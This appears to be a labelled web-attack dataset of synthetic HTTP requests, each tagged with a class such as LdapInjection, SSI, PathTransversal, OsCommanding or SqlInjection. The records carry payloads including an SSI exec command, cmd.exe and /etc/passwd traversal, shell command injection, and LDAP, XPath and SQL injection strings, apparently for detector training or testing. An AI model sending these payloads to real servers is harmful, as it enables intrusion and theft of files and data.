Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Date: Wed, 17 Jan 07 16:02:28 CET
ETag: "BSYbTuX7wGz5Vkk"
If-Unmodified-Since: Sun, 17 Aug 08 21:18:28 GMT
If-Match: "gJn6iID_bB5P7NJr"
If-None-Match: "xfyccxVZX8PEhqBW"
Authorization: ipAh lmohRey=elhu
Referer: http://www.ceaaon.de/9qaooyal/gere/ddsetPon.php
User-Agent: sn3c4a92e (8PqvPm9Qd4; s-F2eAj; i5@n-BBA1; twmUp@Mn)
Via: sht/4.6 236.217.3.54, FTP/8.7 156.68.105.23, HTTP/6.5 7.69.99.82:6

null

End - Id: 40616
Start - Id: 37874
class: LdapInjection
GET /nmbadaSrtIim/nzm7ezrn9Amma/ejaaeghitWe5Otezo/enyE9ZWkkmDb/lh/s_-r/e_V7nc3Tvfg1m0XWcNO@/tWBnDfoct/Dgluvt/e4PF9I/hT1gy7Danr3tDLCwh.asmx?9incr=046745&nclenAi=in6xlEyRlmbehcoi&bdcaElaaotRek=dPizVAajF&Etcsdb=ofs+%3Doymtx-6iaid%40ej4&Fzgeoo=5269%29%28%26%28objectClass%3Dxco%29%28%7C%28sn+%3D++iwn1%29%28cn%3Ds+J*%29%29&4Ement5=099619896 HTTP/1.0
Host: 49.122.150.99
Connection: keep-alive
Accept: text/xml, image/*, video/*;q=0.5
Accept-Charset: x-mac-arabic;q=0.1
Accept-Encoding: identity;q=0.8, identity, deflate;q=0.9, deflate;q=0.9, identity;q=0.7
Accept-Language: ee-iewoAeus
Cache-Control: max-stale=9
Client-ip: 243.107.176.204
Cookie: 6c=78;5b1ngchnekpeos=il:adminy|i8gsee0 insert
Cookie2: $Version="0"
Date: Sat, 14 Oct 06 02:06:42 CET
ETag: W/"pzr-MWT_QI7QEla-I"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Mon, 20 Oct 08 12:09:54 UTC
If-Match: "j03sBA-skXanwNiI"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: Fri, 12 Mar 04 05:36:31 CET
Max-Forwards: 1743
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: mHrk sGamdg=QmliIol
Range: 89-,46-035533,8-609
Referer: http://0d7n.gov/oonu/lmyn/2xpp.zip
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: lATiHLF http://www.rhea0.st
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.1 178.2.110.138:185, 7.6 www.eepQitop.css, 8.4 231.254.118.238
Transfer-Encoding: compress
Upgrade: Glcnde/7.1, tipm45/0.4, nene/5.9
Warning: 829 201.112.203.99:9152 "tindRfilanlsihtasia" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 37874
Start - Id: 40252
class: SSI
POST /mtneeSEmnnaz/h3ugFeHSTbgsP/KeuWJlsoBpj/ptNTJS-w@e8nsWEkdwL/eJSBqtNjgC_8fAKFv9B/jngTZm4frrdeMmxo/jolZ/dechNriztrdy3mtdt.php4? HTTP/1.0
Content-Length: 182
Content-Language: yo1l,emttreph
Content-Encoding: gzip
Content-Location: /re0xum.asmx
Content-MD5: bjRzMHNhaGhhb2hhbmRFeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Oct 09 18:06:11 GMT
Last-Modified: Tue, 12 Sep 06 05:55:56 UTC
Host: www.TNhmtnnae6.be
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-korean;q=0.2, big5;q=0.4
Accept-Encoding: deflate;q=0.4
Accept-Language: efta-pe, aL-eibaes;q=0.0
Cache-Control: min-fresh=6643
Client-ip: 171.88.48.143
Cookie2: $Version="7"
Date: Wed, 05 Dec 07 18:07:05 GMT
ETag: "QQY_.zvrgninbUH8uvt"
Expect: 4tksenn1=dexsrl4s;caevs=w60etc
From: YHtcdN@wRae.uk
If-Modified-Since: Mon, 13 Nov 06 22:51:02 UTC
If-Unmodified-Since: Thu, 24 Mar 05 01:21:12 GMT
If-Match: "Log6IoplvEnqVR7d"
If-None-Match: "LEA3A4zo@qHNPkGBl"
If-Range: Wed, 13 Dec 06 17:22:43 CET
Max-Forwards: 31
Pragma: ets='jawr'
Proxy-Authorization: Basic b3FoYW56ems6OTdpbG8=
Authorization: NTLM MnJtUzd5ZUlpYnVrMGRjYW1hc1JvT2VlZXBvb25tdGlpZHJhdA==
Range: 7-1281,22479-
Referer: /slbmy6a/neijdTie/eLf5m/i7ashpxt.php4
TE: trailers
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u 0.6; sy-EH; rv:8.8.6) Gecko/67237464
UA-Disp: 3250,7812,32
Via: FTP/1.3 www.ceos.tiff:440
Transfer-Encoding: ekSiea; 8exIen=aNs8
Warning: 524 216.140.150.200 "ytojircesetlOqieus" 
----: --------------------

qnedDadaIf=tgm&ssos=<!--#exec   cmd="c:\progra~1\e7eio\Thena\ahct7r.exe   d:\uh2ewteSl\www.sianenar.org\uT\database.mdb    /x exporttofoxpro"-->

End - Id: 40252
Start - Id: 49590
class: XPathInjection
GET /zjoin/nsJc/sswnufaw7iooantx/s@/mgoom/iU7nkaktqfrroj4/tdzadsgs/rjq7TWDt9TgpyCaOe/ii/keUdEK51V.html?edlettaernEttd=lltlxi%27++or+++6++%3C++count%28path%2Fchild%3A%3A*%29+++or+++++%274Ne%27++++%3D+++%27&no=Hp%27r3+yi&gnlMR4ur=thnqtIu&bioseesiaangsWh=22619&QH3qGUstyleD6=2aeocS5e9s&1dhmt9ocfrdehfe=ngrH&BUwcQa=05&iIsdsai=ii&aaCptd5cew=ene1%5CnaR&eaynnutt8jham=40 HTTP/1.0
Host: 107.34.60.202
Connection: asiaeme
Accept: */*;q=0.1
Accept-Charset: ks_c_5601-1987
Accept-Encoding: *
Accept-Language: wh-N
Cache-Control: min-fresh=7
Client-ip: 152.142.239.164
Cookie: cD=union;aWSJem=177
Cookie2: $Version="81"
Date: Wed, 09 Mar 05 20:50:30 GMT
ETag: "P5HHX.8tz6s5kz9aYcf6"
Expect: 100-continue
From: rmya@typuTon9h.uk
If-Modified-Since: Wed, 14 Oct 09 22:41:20 UTC
If-Unmodified-Since: Fri, 03 Feb 06 01:01:40 UTC
If-Match: "yuUsyu_rHXkxVVf12F"
If-None-Match: *
If-Range: Thu, 17 Apr 08 09:13:02 GMT
Max-Forwards: 58
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM ZGRhaWJzeWVub0VzdHN0ZnRIZTBhZXNodHN6MW1ud3RiZWo3Yw==
Authorization: Basic dzljSGVpcTo3bHRl
Range: 124-314534,89-
Referer: http://www.jtiltppN.cz/hdogwe/ty8trIn/4rRmeaay/ahtsihN/ao7O.css
TE: deflate;q=0.8,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 6.8; l7-jE; rv:0.1.7) Gecko/27003082
UA-CPU: StrongARM
UA-Disp: 427,3177,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 122x540
Via: eeeMst/2.4 244.252.198.119, rmnb/7.1 www.oaENaF.gif, FTP/4.1 13.11.4.99:185
Transfer-Encoding: identity
Upgrade: hTS/5.6
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 49590
Start - Id: 35410
class: SqlInjection
GET /vQimF6jTYtsS/e1tf/3eimssdd8nlteeeiw9/oSqPm.html?qIov5c4HQ=ijld-Hwm%40tP&exec.VL@vT848q5=select+++9Tet++++from++++ALL_USERS HTTP/1.0
Host: www.aac1cbneh.de:80
Connection: keep-alive
Accept: audio/basic;q=0.5, audio/x-wav
Accept-Charset: windows-1255;q=0.4, euc-kr, iso-8859-6
Accept-Encoding: compress
Accept-Language: Ysttdfut-u;q=0.4, enaw-t;q=0.1, Dt-ogqred, tArr-yi;q=0.3
Cache-Control: no-cache
Client-ip: 67.105.71.5
Cookie: nsGAnHmgs3=eT0apbinol;esn[u
Cookie2: $Version="1"
Date: Mon, 17 Oct 05 10:55:01 GMT
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 100-continue
From: meCo6@c0Onn.it
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Thu, 28 Dec 06 10:57:58 UTC
If-Match: *
If-None-Match: *
If-Range: "71sJhQ_j41GbmmWwkj"
Max-Forwards: 28
MIME-Version: 4.3
Pragma: 7ehG9onb=rbve3oe
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Digest uri=http://www.bsMelbzd.biz/3ad0nesw/eneh/taSr.pdf
Range: 876043-,327-,6-
Referer: /eleqe1e.dll
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 6.2; nt-ep; rv:8.0.2) Gecko/08374463
UA-CPU: 68000
UA-Disp: 678,1314,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: 1.0 www.lbur.html, e5soa2/7.9 www.fo4k2w.htm
Transfer-Encoding: gzip
Upgrade: cd4ali/2.0, 7coFhe/3.3, gftEc/8.2, AtJar/5.6, t7rii/7.9
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 840148
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35410
Start - Id: 45129
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.1
Host: www.ehkeavfcmn.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-10646-ucs-2, euc-kr, cp-932;q=0.5, x-mac-arabic, cp-932
Accept-Encoding: *
Accept-Language: ndew-e, o-ssa6t;q=0.8, tladnnio-hFdHutdv;q=0.8
Cache-Control: min-fresh=861
Client-ip: 223.196.253.50
Cookie: h4fsHAttn=joystn;FhhhiIum=rh;MtfeAi6t=2;nhtHbrsubz9lbia=md%ucN r1'C e
Cookie2: $Version="6"
Date: Sun, 22 Oct 06 01:31:07 CET
ETag: W/"d3mNFnIN_1gDH9-Xe0"
Expect: 100-continue
From: llve@cWpjrsf1r.biz
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Thu, 19 Feb 04 18:51:05 GMT
If-Match: "wZucsqr@HlFv@TYgFzo"
If-None-Match: *
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 10
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Basic dHQwSWFicjo3c2FpYXM=
Range: -3,456-488022
Referer: /hcatwlte/erheerpw/saruria.jpg
TE: deflate;q=0.4,trailers,gzip;q=0.0
Trailer: Host
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 3.5; ce-oB; rv:4.3.5) Gecko/73570875
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0464x327
Via: 5.5 120.26.172.133
Transfer-Encoding: deflate
Upgrade: rnttO/3.2, lWf/3.6
Warning: 694 75.28.35.212 "sieenweirr1p" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45129
Start - Id: 46430
class: PathTransversal
GET /omKAUqtC29T/gWWsEkpPyEOCbPR-lfEj/elEgFf8fHoE/CEPRaTha9q/i2t/sdxlmamkh/52ZincludegXHPJR.png?8ziJ_iframeAQLAs=16278&4PWwiVWgmtwindow.open.=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html HTTP/1.0
Host: 210.97.248.145:6899
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity, compress;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-cache
Cookie2: $Version="84"
If-Unmodified-Since: Wed, 14 Feb 07 11:12:33 CET
If-Range: *
Max-Forwards: 141
MIME-Version: 9.4
Pragma: e=sl
Proxy-Authorization: E0mqn 5bih=ea6O4
Referer: /utenhi0/wCro/cnpseett/msornrr.msf
TE: trailers,trailers,deflate;q=0.9
User-Agent: Eoxlo (yqHdtAO; thLaM_)
UA-CPU: MIPS
Via: 4.0 www.Omnpl.tiff, HTTP/3.6 www.tasl.gif
Transfer-Encoding: identity

null

End - Id: 46430
Start - Id: 38222
class: LdapInjection
GET /sol4beeY/JOnb1/c6.rCHIND78Qpqyu/uEL7c7R.qC/nrtTV/lwe/dHQz5n8./ppasswd9idOBPZWN/m@z3uvnu/npuC.jpg?Nsa=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&mnu1p0=ssLyV0qqh&2sf5xc7rgio=ndahtEeoiSvec&mMYar=76963&todet23pboe=%27%40cIaCkNe%26%5B%25lmetahk&73-9wHtOTy=lutunions&ixxeIodiie1huts=Lbnraqiiiselectfoa9iotso&SOqKU=+Eo&itcwelEGixnh=nOitn4+Ei1eawhere&naMrtos=nyopecslfd&mEbedsh=oLbwpsmT&smEcieh=scn&aonntnem=nWMSu HTTP/1.0
Host: 110.164.145.1:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: 1-Dbe;q=0.0
Cache-Control: no-cache
Client-ip: 63.225.80.253
Cookie: enepwoyVcuguo=oltdp;asT= anewnEadmin;mtlaod=h;LGAdwr4OnRT=slbh0bbqndmtpui;jih=eP4YS
Cookie2: $Version="194"
Date: Sun, 24 Oct 04 14:38:04 CET
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Sun, 20 Dec 09 20:29:31 UTC
If-Unmodified-Since: Fri, 21 Mar 08 20:02:01 GMT
If-Match: "V9PGZj@JWsjgO66RM"
If-None-Match: "CY-_ds65mePOcEr"
If-Range: "1ZsTI_bCGgLL76zzUs."
Max-Forwards: 708
MIME-Version: 3.2
Pragma: evt='g'
Proxy-Authorization: lN7eh8 3eeeTvs=rP8rhi
Authorization: c6aisn 1pjoh0c=tcdaae
Range: 491-,605-2708,157323-67914
Referer: http://www.eehama.net/yeheneer.swf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.0 (compatible; Konqueror/5.9; Windows NT; iedn)
UA-CPU: Sparc
UA-Disp: 782,245,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 321x2267
Via: 9.1 151.234.217.144, FTP/3.9 www.rasg.gif:90, 1.5 171.66.144.67
Transfer-Encoding: compress
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 255.202.197.54
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38222
Start - Id: 37333
class: LdapInjection
GET /7OXv23-COFn/bFborsohznohaggta/reRJBj/ocywaeG1ic/uueoahox6puthida/0Mopt6wnIGg@jZK/avidesUiKPU8YDw7/qqA3V.css? HTTP/1.1
Host: www.psen.fr
Connection: tgoaisce
Accept: application/*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.2, deflate;q=0.7, identity;q=0.6, compress;q=0.5
Accept-Language: eoetnedr-Zth2, txae-sesmhdsN;q=0.5, eeMATYWa-2eT;q=0.5, mxsaad6s-a, Ie2x2lr-gnt;q=0.4
Cache-Control: no-store
Client-ip: 131.232.136.148
Cookie: H0eaaaA=oh s;tee=316740;aqen=9oe0like;dlrtbzOxe=Gf;stecDieeeCt=eya-qdaH@
Cookie2: $Version="671"
Date: Sun, 11 Jul 04 15:34:35 GMT
ETag: W/"NJ1.2WEgk_6awsr54"
Expect: 100-continue
From: ddtp@lesT.org
If-Modified-Since: Tue, 17 May 05 06:56:24 GMT
If-Unmodified-Since: Mon, 01 Mar 04 19:06:46 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Oct 04 03:37:35 GMT
Max-Forwards: 5
MIME-Version: 9.0
Pragma: s=ds8vgs53
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: leaN5 tobtnry7=2diiyo
Range: 06765-95986,-6,-81
Referer: http://Panwsw.net/ieexhnn/0iafbsoi/tdln/slesitF/hitOitg.asmx
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: ) (    |  (   cn=*o   'brien*)(mail =*o   'brien*   ) 
UA-CPU: 68000
UA-Disp: 544,018,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 495x1616
Via: 0.6 178.121.21.218, HTTP/6.0 www.Dei5.html
Transfer-Encoding: identity
Upgrade: 1ebn/7.7, ncep/4.4, t8re3m/6.5, PXE/8.4
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 255.193.19.186
X-Serial-Number: 06549032
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37333
Start - Id: 44846
class: PathTransversal
GET /rcpsock_streamfFUy/_clCQ0QFTdQy/t-Pe/CarfaD-SpasswdiVto/4x2tmsisiu0xygE/Zaccept3-O8d/Odar/sSCR/ahuttflerzdla/mUit/cIK5B94PODt1hLqz.html?snm=axtermtn&hglltosfu4hb=iu3pqt&rpVn6Xki-=h2ytC&ge8reenrx06bExs=iusrw3%3D%3Dwheret2%3Df&ls95V=4841412&vetu7exaacsnYh=wCL_uXa&leuasooiae=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&ccat2nullTJexec8vu=MqsurCtEOtra381eH&neefe1i6r=n&siewn9rhlN=tx&0oiph=642&lpr=71124 HTTP/1.1
Host: 35.225.27.249
Connection: keep-alive
Accept: image/*;q=0.6
Accept-Charset: iso-8859-1;q=0.5, windows-1257, windows-1255, ks_c_5601-1987;q=0.9, euc-jp;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 55.4.250.85
Cookie: eo5he=<7l5hs;gteo8ia3EkesAoc=|@ei[;_8documentKBUFfQN=926943;oehssoolA8iuioo=ox6N_E7X
Cookie2: $Version="051"
Date: Tue, 04 Oct 05 07:20:38 UTC
ETag: W/"eWSmgy4O4E8KbW15NvP"
Expect: 100-continue
From: hohEtsbm@c8e2atu1l.be
If-Modified-Since: Wed, 04 Mar 09 02:05:25 GMT
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: *
If-None-Match: "8spgIl6Vt8rYwmzm"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.5
Pragma: nmb1l=wewhttdc
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: iYti dnel1=iitt
Range: 776321-,6-
Referer: http://owcQ.net/gfatn/dtoiti/Re4us7/e2qi.html
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: sAautbei5t (tIuiNfJ; mbcigH5bJ3; mPGMF2z1bw; n5-T7P.mG_; iED3bOT)
UA-CPU: StrongARM
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: FTP/4.6 245.27.1.119:9011, 2.4 www.iy6g.png, 8.5 www.hhueP.gif
Transfer-Encoding: etaite; x1hgeh=nuoa
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44846
Start - Id: 46337
class: PathTransversal
GET /X5LG1psscriptBtdpassthruaO_/z1aanqh9dcmAi/0ctf9ttiSis5ron4/agyhthmNgkagneg/LEjtA/MEXF2opt/t4tsjtoel/iosoOt3eorMif.mspx?tncvaiis=5049858809&dsOrnDrjiCicLaa=oitmdn94tuehh&tn2eto3o=po9m6Sf%3Ceetsr&nE=2Ersamtdehpxt&7YgWjEFP=ta&Y8oewii2cttwam=9799&dnevqwhdAy=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&szW6autoexec=sa&beH1eUa7masosb=Ad7apareshProTt&u4=1&sqnutcloupte=duWDyKh02s&nAisn=461&7lcoleseocdtaa=ixp0 HTTP/1.1
Host: 9.43.136.119
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: cp-936;q=0.1, x-mac-roman, x-mac-chinesesimp, x-mac-roman
Accept-Encoding: identity;q=0.2, deflate, deflate;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 142.8.138.99
Cookie: hbsn=37;tqVrncmmfiaw=a;etcO3kz=537845;6ojOh0=2ela;imgDfromfnXeua=isao
Cookie2: $Version="16"
Date: Fri, 26 Oct 07 08:39:35 GMT
ETag: "cFHA7u2hDckalHKlwq"
Expect: 100-continue
From: 5alenh@genhnf8.org
If-Modified-Since: Thu, 17 Nov 05 09:47:56 UTC
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "kuWzHXTzh7UY.N64"
If-None-Match: *
If-Range: Sun, 21 Jan 07 18:04:25 UTC
Max-Forwards: 6665
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: josyh eeusucc9=tlhwlepi
Authorization: Basic bWFwNXNnZjpkYXNvbg==
Range: -282967,968090-1346,1029-352
Referer: /seeao/gereg/ttaesqY4/mntn/oranr.avi
TE: trailers,deflate;q=0.1,trailers
Trailer: If-None-Match
User-Agent: ymtH (epPuruvW; hmToes8; aM@dY3p; o7kWKc; vKkjPg)
UA-CPU: PowerPC
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3713x610
Via: FTP/6.3 154.147.197.111:0, FTP/6.2 21.191.231.200
Transfer-Encoding: compress
Upgrade: zetne/3.4, eeirz/9.6, roaisl/4.6, ikirr/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 33688817267765601
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46337
Start - Id: 44546
class: OsCommanding
GET /bin/itsrooa.pl/seite=;cat eshop.pl|? HTTP/1.1
Host: 113.188.29.49:4046
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 15.83.253.70
Cookie: @1orsock_streamDobody=aresaIouruhx;ta=39551724;S8S3Ow0=6230764;eenitrkaoa=te;8vautoexecoSp=te@lvbscriptperl$ale
Cookie2: $Version="02"
Date: Sat, 15 Oct 05 21:08:11 GMT
ETag: "jkPmPul2szt6mLKeLP"
From: 8ofb@eetrrga.de
If-Modified-Since: Wed, 10 Mar 04 12:21:50 GMT
If-Unmodified-Since: Sat, 01 Oct 05 24:33:49 GMT
If-Match: *
If-None-Match: "pIRxJZZe33nH.B71FO"
If-Range: Thu, 01 Feb 07 18:09:19 GMT
Max-Forwards: 4262
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: NTLM eUVhdFlmbnJkd2U0bWh3cmVOdGlvZmQ5aG95ZWRkc3k=
Range: -06354,383-6635,26244-
Referer: /o8dtoari/oseen/AaiT/eppw.cfm
TE: deflate;q=0.2
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.0 (X11; U; Solaris 8.8; 49-5r; rv:2.2.6) Gecko/01848539
UA-Pixels: 8286x4573
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: deflate
Warning: 178 www.psrrz.gif:1 "5eiuelyVouirXa" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44546
Start - Id: 43837
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.essnq.org
Connection: keep-alive
Accept: image/*, text/*;q=0.3, text/xml;q=0.0
Accept-Charset: iso-8859-5, iso-8859-8
Accept-Encoding: *;q=0.9
Accept-Language: nTteanol-c;q=0.4, euesUxh-0akttop;q=0.0, os-mEr;q=0.4
Cache-Control: max-age=02
Client-ip: 173.14.37.174
Cookie: o3nra=H'o>%us5dakth
Cookie2: $Version="61"
Date: Sun, 11 Sep 05 18:14:14 GMT
ETag: "zQHzJlf7BIhHrxg"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Sun, 01 Aug 04 24:37:47 UTC
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: "EL8dZILjk3JALA.lmp"
If-Range: "JJLnz_Jj8MknVuRPq"
Max-Forwards: 1
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM d3JhcnppaGF6bWlFYm5pUG9zZHQ0bGRFczBlc2g5b2NldW8w
Range: 653-,494-99921,2-094773
Referer: /lgr9d2i.pl
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/7.6 (Windows; U; WinNT 1.5; ad-y6; rv:7.3.7) Gecko/85136116
UA-CPU: PowerPC
UA-Disp: 431,094,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: n5chnh/5.3 www.edycuzEd.shtml
Transfer-Encoding: eoshG
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43837
Start - Id: 36859
class: LdapInjection
GET /oLEMlEcsJ.kTJcDQXQ5g/cBDiRu-_cWd7x./t2uFnpW@qHCYWm_L5/vetd/egicyL9orn5btrnNale/I6FVQ9mwPp0sZ/DuojmisdhEehei/eh0tentnteessoehhq.shtml? HTTP/1.0
Host: www.mbii.biz
Connection: close
Accept: image/gif;q=0.5, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 209.177.77.169
Cookie: aHha=b ;deall nqsoZhta
Cookie2: $Version="9"
Date: Fri, 03 Mar 06 12:50:19 GMT
ETag: "93Pa0A.Gi0zdrPvWdQy1"
Expect: 100-continue
From: lvelladt@3trbvtitH.net
If-Modified-Since: Tue, 30 May 06 03:52:06 GMT
If-Unmodified-Since: Wed, 06 Oct 04 09:41:47 GMT
If-Match: "zRzehBEAj8jTFKdQmY"
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 9.1
Pragma: l=ik
Authorization: Digest uri=http://eiecdnRr.ch/Iftd/y8awyiFe.png
Range: 62221-7,-0
Referer: http://7nmghinO.de/8do3rtcw/bci7Osp/e2soase/dBIM/gzo0R3j.sh
TE: chunked
User-Agent: oe9)(&(objectClass=    oan*)
UA-CPU: MIPS
UA-Disp: 564,7539,32
UA-Color: color32
UA-Pixels: 6170x381
Via: FTP/9.3 30.130.172.73
Transfer-Encoding: 3em9h0
Warning: 867 89.104.184.212 "huesnmueeatale" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36859
Start - Id: 35252
class: SqlInjection
GET /7sEehrscit54e/AyJcoveval.y089Xl7/access_logekGUbVMz2MuWSP/1doh7Sl9bsiTlsaubol/kN8/geSb6ytEqtesBg60a/OyF3C1YTUfl/l9exrerf.shtml?dltrt=sH%7EdrtR-r+ehhEmO++&CBN_=89&k7ruuato=%27+++++%2F**%2F+++OR+++++%2F**%2F++%272tNt%27++++%3E+%27S&telwnd=2zud5g8-echoqhV%27tc+ensa&tee=458279&8t5sedora=aYIS%40b2Jgr&6eeegdneawnf=7l%2Fr&Gs23th2Rhdrnek=e%3Bnnn+e4xautoexecye HTTP/1.1
Host: 90.55.21.59:80
Connection: senc
Accept: */*;q=0.9
Accept-Charset: iso-8859-3, ks_c_5601-1987, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: a-n, hio-7nkmh;q=0.0, e2ti-iOtrS20;q=0.0, u2nl-hoeiset9;q=0.1
Cache-Control: max-age=33
Client-ip: 149.160.7.148
Cookie: mE=gGBo;yami3h6ed1hH=rad;tgdee=b1GGs;xZQD= :anO-8z
Cookie2: $Version="7"
Date: Thu, 12 Aug 04 11:03:39 UTC
ETag: W/"DwexuFP2Uv@IX0e"
Expect: ot0agzmn
